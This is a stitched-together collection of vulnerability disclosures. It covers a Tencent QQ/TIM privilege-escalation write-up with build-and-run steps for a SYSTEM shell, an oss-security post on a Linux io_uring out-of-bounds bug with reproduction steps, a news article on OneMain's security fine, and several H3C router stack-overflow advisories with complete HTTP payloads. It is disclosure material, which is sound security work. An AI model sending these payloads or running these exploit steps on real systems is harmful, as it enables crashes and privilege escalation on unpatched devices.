In Tencent QQ through 9.7.8.29039 and TIM through 3.4.7.22084, QQProtect.exe and QQProtectEngine.dll do not validate pointers from inter-process communication, which leads to a write-what-where condition.

**Tencent QQ/TIM Local Privilege Elevation**

Affected Products:

*   QQ 9.7.1.28940 ~ 9.7.8.29039
*   TIM 3.4.5.22071 ~ 3.4.7.22084

Affected Components:

*   QQProtect.exe 4.5.0.9424 (in TIM 3.4.5.22071)
*   QQProtect.exe 4.5.0.9426 (in QQ 9.7.1.28940)
*   QQProtectEngine.dll 4.5.0.9424 (in TIM 3.4.5.22071)
*   QQProtectEngine.dll 4.5.0.9426 (in QQ 9.7.1.28940)

**1\. Summary**

Tencent QQ and TIM are two instant messaging softwares developped by Shenzhen Tencent Computer System Co., Ltd. They both have a component _QQProtect.exe_ locating in %ProgramFiles(x86)%\Common Files\Tencent\QQProtect\bin. _QQProtect.exe_ is installed as a Windows service named _QPCore_ and runs as NT Authority\SYSTEM automatically when system starts up. Both the component _QQProtect.exe_ and its dependent DLL _QQProtectEngine.dll_ have an arbitrary address write vulnerability. An attacker with low privilege can load evil DLL inside QQProtect.exe process by combining the two vulnerability and gets NT Authority\SYSTEM shell.

**2\. Vulnerability**

The first vulnerability is the code at QQProtect.exe+0x40c9f8:

where a2 is a pointer that can be controlled by an attacker and dword_41a740 is a global variable whose value is 0x00000001. So an attacker can write the value DWORD(1) at any address.

The second vulnerability is the code at QQProtectEngine.dll+0x3B4F6:

where v3 is a pointer that can be controlled by an attacker. So an attacker can write the value std::bit_cast<DWORD>(ptr) + 4 at any given address ptr.

An attacker can tamper with a function pointer resides in QQProtect.exe and use ROP chains to execute arbitray code easily due to the fact that QQProtect.exe does not have ASLR protection.

**3\. Proof of concepts**

The poc code is written in Rust language. You should use i686-pc-windows-msvc toolchain to compile it.

$ cd poc
$ cargo +stable-i686-pc-windows-msvc build --release --config "build.rustflags = \[\\"\-C\\", \\"target-feature=+crt-static\\"\]"

You will get two DLLs:

    target\release\tinyxml.dll
    target\release\evil.dll
    

Then put the two Dlls above and %ProgramFiles(x86)%\Common Files\Tencent\QQProtect\bin\QQProtect.exe togather in a folder.

Finally get NT Authority\SYSTEM shell with one command:

$ QQProtect.exe <PATH TO evil.dll\>

**4\. Demonstration**

CVE-2023-34312: GitHub - vi3t1/qq-tim-elevation

A flaw was found in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) in the Linux kernel that allows out-of-bounds access to physical memory beyond the end of the buffer. This flaw enables full local privilege escalation.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Mon, 8 May 2023 16:01:59 +0200
From: Tobias Holl <tobias@...ll.xyz>
To: oss-security@...ts.openwall.com
Subject: Linux kernel io\_uring out-of-bounds access to physical memory

Hi all,

a bug in the fixed buffer registration code for io\_uring
(io\_sqe\_buffer\_register in io\_uring/rsrc.c) allows out-of-bounds access
to physical memory beyond the end of the buffer. This can be used to
achieve full local privilege escalation.

The vulnerable code landed in 6.3-rc1 with commit 57bebf807e2a
("io\_uring/rsrc: optimise registered huge pages")¹.

A fix has been committed upstream for 6.4-rc1 in commit 776617db78c6
("io\_uring/rsrc: check for nonconsecutive pages")². The fix has also
been staged³ for 6.3.2.

CVE assignment for this issue is pending.


The idea behind the original commit is that instead of splitting huge
pages that are registered as a buffer into individual bvec entries
(expensive), we can just have a single bvec entry for all parts of the
huge page that are in the buffer (not expensive). Specifically, if all
pages in the buffer map to the same folio, it will use the first struct
page and the length of the buffer in a single bvec entry rather than
mapping each page individually.

For a normal huge page, this works. Unfortunately, this misses the fact
that just because the pages map to the same folio, they do not
necessarily have to be consecutive. In fact, they can all be the \_same\_
page of memory (e.g. by repeatedly mapping at offset 0 from a memfd).
Then, the bvec will span far beyond the single page that it is actually
allowed to touch. Later, IORING\_OP\_READ\_FIXED and IORING\_OP\_WRITE\_FIXED
allow us to read from and write to the buffer (i.e. the memory pointed
to by the bvec) at will. This allows read/write access to the physical
memory behind the single page that we actually have.

The actual length of the buffer (and therefore the limit of our OOB
access) is only limited by the number of pages we can map (generally
close to vm.max\_map\_count, since each mapping of the same page requires
a new mapping). If hugetlbfs is enabled and huge pages are set up, you
can use them to access even more memory, but this isn't generally
required in order to find something interesting in the accessible
memory.


TL;DR bug reproduction steps:
  1. Create a memfd
  2. fallocate a single page in that file descriptor
  3. Use MAP\_FIXED to map this page repeatedly, in consecutive locations
  4. Register the entire region that you just filled up with that page as
     a fixed buffer with IORING\_REGISTER\_BUFFERS
  5. Use IORING\_OP\_WRITE\_FIXED to write the buffer to some other file
     (OOB read) or IORING\_OP\_READ\_FIXED to read data into the buffer (OOB
     write).

Of course, from there, we can simply find any interesting object in
physical memory and start overwriting function pointers to get code
execution and escalate privileges. A full proof-of-concept exploit with
a bit more robustness can be found at
   https://tholl.xyz/static/bugs/2023-io\_uring-fixed-buffers/exploit.c

-- Tobias


¹ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=57bebf807e2abcf87d96b9de1266104ee2d8fc2f
² https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=776617db78c6d208780e7c69d4d68d1fa82913de
³ Commit 14ad317320c7c000e89ee5a928b9ca165443af0e for 6.3.2-rc1,
   https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable-rc.git/commit/?h=linux-6.3.y&id=14ad317320c7c000e89ee5a928b9ca165443af0e

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2023-2598: security - Linux kernel io_uring out-of-bounds access to physical memory

Categories: Business
Tags: one-man

Tags:  financial

Tags:  loans

Tags:  cyber

Tags:  lapses

Tags:  security

Tags:  update

Tags:  New York

Tags:  lapse

We take a look at a fine totalling millions aimed at financial services company OneMain.



(Read more...)




The post Financial services company OneMain fined $4.25 million for security lapses appeared first on Malwarebytes Labs.

A series of security errors and mishaps has cost personal loan provider OneMain $4.25m in penalties, issued by the New York State department of financial services. The fines, coming at the end of a detailed investigation into how security practices at the company were determined to be below-par, serve as a timely warning to other organisations.

OneMain experienced “at least” three security incidents over three years, from 2018 to 2020. The business is a licensed lender and mortgage servicer and as SC Magazine notes, financial entities should adhere to a framework of security requirements. These requirements include that best practices are evident at all times to ensure both consumer data and internal systems are safe from harm. From the DFS release:

> …OneMain Financial Group LLC (“OneMain”) will pay a $4.25 million penalty to New York State for violations of DFS’s Cybersecurity Regulation (23 NYCRR Part 500). OneMain failed to effectively manage third-party service provider risk, manage access privileges, and maintain a formal application security development methodology, significantly increasing the company’s vulnerability to cybersecurity events.  

Unfortunately for OneMain, the New York State investigation highlighted several major issues which resulted in the eventual settlement. Going back to the release for some examples:

> ...OneMain permitted local administrative users to share accounts, compromising the ability to identify malicious actors, and also permitted those accounts to use the default password provided by OneMain at the time of user onboarding, increasing the risk of unauthorized access.

Use of default passwords is bad enough, but SC Magazine also notes that a file containing passwords was stored in a folder named “PASSWORDS”. Add to this that access restrictions were not good enough, and you have a recipe for disaster.

The release continues:

> The Department’s investigation further found that OneMain’s application security policy lacked a formalized methodology addressing all phases of the company’s software development life cycle. Instead, OneMain used a non-formalized project administration framework it had developed in-house that failed to address certain key software development life cycle phases, a consequence of which was increased vulnerability to cybersecurity events. 

Failing to have any sort of coherent strategy for software life cycles is never going to end well. Whether a business ignores Windows updates, or even maintaining security for bespoke setups and software, the possibility of falling victim to an attack can only ever go up as time passes.

So far we’ve seen issues with default passwords, data storage, and software life cycle management. This alone would be bad enough. However, the next issue pulled up as evidence of the fine-worthy practices may well be the worst of the bunch. We go once more to the release:

> OneMain did not conduct timely due diligence for certain high- and medium-risk vendors, despite the existence of a third-party vendor management policy requiring that each vendor undergo an assessment to determine the vendor’s risk rating and the appropriate level of due diligence OneMain should perform on the vendor. OneMain further failed to appropriately adjust several vendors’ risk scores even after the occurrence of multiple cybersecurity events precipitated by the vendors’ improper handling of non-public information and poor cybersecurity controls.

What this means is that OneMain worked with various third-party vendors without doing their due diligence in terms of potential security threats. This is despite many of the vendors being flagged as medium to high risk.

With all of this in mind, it’s perhaps easy to see why the New York State DFS started down the road to such a fine. Even so, The Record notes that OneMain reported $1.09 billion in revenue for the first quarter of 2023. While we can ponder if a few million in fines makes much of a difference overall, OneMain has agreed to “engage in further significant remediation measures”. It remains to be seen what the consequences will be should they not stick to the plan.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Financial services company OneMain fined $4.25 million for security lapses

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the Edit_BasicSSID interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the Edit\_BasicSSID interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the Edit\_BasicSSID interface at /goform/aspForm. ## Vulnerability Details !\[\](https://hackmd.io/\_uploads/Bk4CQusE3.png) In the Edit\_BasicSSID function, local variable v32 is 64 bytes long. !\[\](https://hackmd.io/\_uploads/HkxTRm\_s4h.png) V31 can be controlled by attacker, entered as parameter 'param'. In line 51, v31 is formatted into v32 by function sscanf as long as the size of the data we enter until ';' without filtering or checking length. So when the size of the data we enter before ';' is larger than 64 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://hackmd.io/\_uploads/H1dtUui4h.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 602 CMD=Edit\_BasicSSID&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://hackmd.io/\_uploads/H1Ni8dsV3.png) And you can write your own exp to get the root shell.

CVE-2023-33642: H3C Magic R300-2100M was discovered stack overflow via the Edit_BasicSSID interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the AddWlanMacList interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the AddWlanMacList interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the AddWlanMacList interface at /goform/aspForm. ## Vulnerability Details !\[\](https://hackmd.io/\_uploads/ry9T-do4n.png) In the AddWlanMacList function, local variable v5 and v6 are both 32 bytes long. !\[\](https://hackmd.io/\_uploads/rkfRZui4n.png) V3 can be controlled by attacker, entered as parameter 'param'. In line 30, v3 is formatted into v5,v6 by function sscanf. So when the size of the data we enter between the first and second ';'(or the second and the third) is larger than 32 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://hackmd.io/\_uploads/rJxnzOj4h.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 608 CMD=AddWlanMacList&param=1111;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://hackmd.io/\_uploads/ryypGuiEn.png) And you can write your own exp to get the root shell.

CVE-2023-33643: H3C Magic R300-2100M was discovered stack overflow via the AddWlanMacList interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the Edit_BasicSSID_5G interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the Edit\_BasicSSID\_5G interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the Edit\_BasicSSID\_5G interface at /goform/aspForm. ## Vulnerability Details !\[\](https://hackmd.io/\_uploads/H1Tdw\_jN2.png) In the Edit\_BasicSSID\_5G function, local variable v32 is 64 bytes long. !\[\](https://hackmd.io/\_uploads/SJvKvuiN2.png) V31 can be controlled by attacker, entered as parameter 'param'. In line 51, v31 is formatted into v32 by function sscanf as long as the size of the data we enter until ';' without filtering or checking length. So when the size of the data we enter before ';' is larger than 64 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://hackmd.io/\_uploads/HyT5IFjE3.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 611 CMD=Edit\_BasicSSID\_5G&param=1111;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://hackmd.io/\_uploads/r1LI7qiEn.png) And you can write your own exp to get the root shell.

CVE-2023-33638: H3C Magic R300-2100M was discovered stack overflow via the Edit_BasicSSID_5G interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the UpdateMacClone interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the UpdateMacClone interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the UpdateMacClone interface at /goform/aspForm. ## Vulnerability Details !\[\](https://i.imgur.com/XV02XyL.png) In the UpdateMacClone function, local variable v9 is 64 bytes long. !\[\](https://i.imgur.com/kfAEysE.png) V7 can be controlled by attacker, entered as parameter 'param'. In line 21, v7 is formatted into v9 by function sscanf as long as the size of the data we enter is less than 512 bytes. So when the size of the data we enter is larger than 64 bytes and less than 512 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://i.imgur.com/zcCWhYp.png) \`\`\` POST /goform/aspForm HTTP/1. Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=; UPGRADE\_SOURCE= Connection: close Content-Length: 534 CMD=UpdateMacClone&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://i.imgur.com/oOVNgxA.png) And you can write your own exp to get the root shell.

CVE-2023-33635: H3C Magic R300-2100M was discovered stack overflow via the UpdateMacClone interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the ipqos_lanip_editlist interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the ipqos\_lanip\_editlist interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the ipqos\_lanip\_editlist interface at /goform/aspForm. ## Vulnerability Details In function ipqos\_lanip\_editlist,the size of local variable v6 is noly 20 bytes long.Parameters in the ipqos\_lanip\_editlist interface use the getElement function to split strings(Var). !\[\](https://i.imgur.com/VC25Mi9.png) !\[\](https://i.imgur.com/Sk8HWLQ.png) The maximum size in the getElement function is limited to 64. The size of the original array has been completely exceeded, resulting in a buffer overflow vulnerability. !\[\](https://i.imgur.com/9e8xgUd.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://i.imgur.com/LcuzKxN.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 2032 CMD=ipqos\_lanip\_editlist&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://i.imgur.com/oOVNgxA.png) And you can write your own exp to get the root shell.

CVE-2023-33636: H3C Magic R300-2100M was discovered stack overflow via the ipqos_lanip_editlist interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the EdittriggerList interface at /goform/aspForm.

